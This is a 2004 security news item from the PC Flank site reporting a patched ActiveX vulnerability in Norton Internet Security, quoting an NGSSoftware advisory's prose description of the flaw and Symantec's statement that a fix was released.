Google
Web pcflank.com
PC Flank Logo
 Make sure
you're protected
on all sides
 Test Your System
 PC Flank Leaktest NEW!
 Quick Test
 Stealth Test
 Browser Test
 Trojans Test
 Advanced Port Scanner
 Exploits Test
 Internet Speed Test NEW!
 Ask the experts
 Leak Tests Catalog NEW!
 Glossary
 Free Security Software
 Comparison & Download NEW!

 

Tip of the day
Remove files in TEMP folders.
Security News

Vulnerability Found in Norton Internet Security

March 26, 2004

One of the software components of Norton Internet Security could allow hackers to use the application as a backdoor into a computer. This flaw occurs in an ActiveX component used by Norton Internet Security, NGSSoftware, security research company. The security breach could be used to run an attack program that would then take control of the computer that the software was intended to protect.

"Installed with Norton Internet Security and Professional is an ActiveX component that is marked safe for scripting, namely WrapNISUM Class. Using the LaunchURL method an attacker has the ability to force the browser to run arbitrary executables on the target. In a real world attack, this would more than likely take the form of a UNC path. It's important to note here that on those Windows operating systems that support the WEBDAV redirector file system if the UNC path cannot be reached over TCP port 139 or 445 it will switch to TCP Port 80 (http). Needless to say this aspect will allow attacks to go through corporate firewalls. The attack can be achieved either by encouraging the 'victim' to visit a malicious web page or placing a script within the content of an (html) email." the advisory stated.

Symantec's Antispam software also has the same issue caused by another ActiveX component. Symantec released fixes for the flaws that are available at its site, through LiveUpdate, the standard update mechanism included with the programs.

"To date, Symantec has not had any reports of any related exploits, and exploit code has not been posted, but we will continue to evaluate this issue," the company said in a statement sent to CNET News.com. "Symantec issued a fix on March 18 for customers to download via LiveUpdate."

Last December, Symantec fixed a problem that affected a small number of Norton Antivirus 2004, Norton Internet Security 2004, Norton Antispam 2004 and Norton SystemWorks 2004 users. For those customers, the applications would mistakenly ask for a product activation code every time a PC was rebooted, and eventually the program would become locked.

 
 
Start Page
Make "PC Flank" your   
Start Page!   
Make

 
Sponsored links


   
 
   
Outpost Firewall PRO 3.0 - complete protection on the Internet!

 
Privacy Policy
    Advertiser Info		 Site Map
    Contact Us

 
 
© 2013 PC Flank Ltd. All rights reserved.